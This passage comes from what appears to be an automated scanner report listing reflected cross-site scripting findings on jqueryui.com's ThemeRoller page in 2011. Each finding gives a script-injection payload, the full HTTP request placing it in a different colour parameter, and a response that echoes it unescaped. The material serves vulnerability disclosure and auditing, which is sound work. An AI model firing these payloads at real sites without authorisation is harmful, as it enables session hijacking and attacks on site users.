...[SNIP]...

3.13. http://jqueryui.com/themeroller/ [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2240d"><script>alert(1)</script>2089f77dadf was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&bord
...[SNIP]...

3.14. http://jqueryui.com/themeroller/ [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a715"><script>alert(1)</script>09e95dd3a22 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff3a715"><script>alert(1)</script>09e95dd3a22&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff3a715"><script>alert(1)</script>09e95dd3a22&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&border
...[SNIP]...

3.15. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4055f"><script>alert(1)</script>0399770b2a2 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e64055f"><script>alert(1)</script>0399770b2a2&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e64055f"><script>alert(1)</script>0399770b2a2&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

3.16. http://jqueryui.com/themeroller/ [bgColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17242"><script>alert(1)</script>bafb8efe2b6 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec17242"><script>alert(1)</script>bafb8efe2b6&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
2121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec17242"><script>alert(1)</script>bafb8efe2b6&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

3.17. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10edc"><script>alert(1)</script>d067a1b35af was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc10edc"><script>alert(1)</script>d067a1b35af&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc10edc"><script>alert(1)</script>d067a1b35af&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

3.18. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84d7e"><script>alert(1)</script>7a510e251a9 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
9999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&b
...[SNIP]...

3.19. http://jqueryui.com/themeroller/ [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e8c7"><script>alert(1)</script>04593ff0f74 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada1e8c7"><script>alert(1)</script>04593ff0f74&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada1e8c7"><script>alert(1)</script>04593ff0f74&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=
...[SNIP]...

3.20. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8aec"><script>alert(1)</script>bd9d43878e2 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaad8aec"><script>alert(1)</script>bd9d43878e2&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
efa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaad8aec"><script>alert(1)</script>bd9d43878e2&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

3.21. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97187"><script>alert(1)</script>2b2f49b085a was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa97187"><script>alert(1)</script>2b2f49b085a&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa97187"><script>alert(1)</script>2b2f49b085a&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.22. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49013"><script>alert(1)</script>e719f071a57 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

